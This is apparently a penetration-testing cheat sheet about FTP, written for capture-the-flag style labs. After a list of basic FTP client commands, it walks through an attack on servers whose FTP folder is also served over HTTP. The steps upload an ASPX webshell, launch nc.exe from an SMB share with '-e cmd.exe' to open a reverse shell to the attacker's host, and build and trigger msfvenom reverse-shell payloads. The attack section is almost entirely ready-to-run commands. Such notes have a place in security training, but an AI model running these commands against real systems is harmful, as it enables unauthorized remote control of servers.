# FTP

## Basics

* [FtpCommands](https://kb.globalscape.com/Knowledgebase/10407/Can-I-use-a-Windows-Command-Prompt-to-send-FTP-Commands-to-a-server)

```
ftp 10.x.x.x    ..connect
help            ..help
pwd             ..print working directory
dir             ..list directory (also: ls)
cd c:\data      ..change directory
lcd /tmp        ..local change directory
get flag.txt    ..download
put test.txt    ..upload
binary          ..Used for graphics, compressed files, audio
put Potato.exe  ..Can now upload EXE
```

## FtpHttp Vulnerability

* If your FTP is also a HTTP directory
* You can upload and execute from http
* REF: develHTB, [ReverseShells](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php)

```
-----------------
-----------------
Webshell
locate *aspx
cp /usr/share/webshells/aspx/cmdasp.aspx .
FTP 10.x.x.x
put cmdasp.aspx
firefox http://10.x.x.x/cmdasp.aspx

-----------------
-----------------
Reverse
locate nc.exe
cp nc.exe .
FTP 10.x.x.x
put nc.exe
sudo smbserver.py share .     ..or use smbshare
nc -nvlp 4444                 ..nc listener
http://10.x.x.x/cmdasp.aspx   ..execute our nc reverse shell
cmd = \\10.x.x.x\share\nc.exe -e cmd.exe 10.x.x.x 4444

-----------------
-----------------
Payloads
msfvenom --list payloads | grep windows
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f aspx -o shell.aspx
msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=4444 -f exe -o shell.exe
ftp $IP
put shell.aspx
put shell.exe
nc -nvlp 4444
firefox http://$IP/shell.aspx
dir C:\inetpub\wwwroot
C:\inetpub\wwwroot\shell.exe
```

## REF

* [TransferFiles](https://pentest.mxhx.org/06-linux-privesc/04-transfer-files#ftp)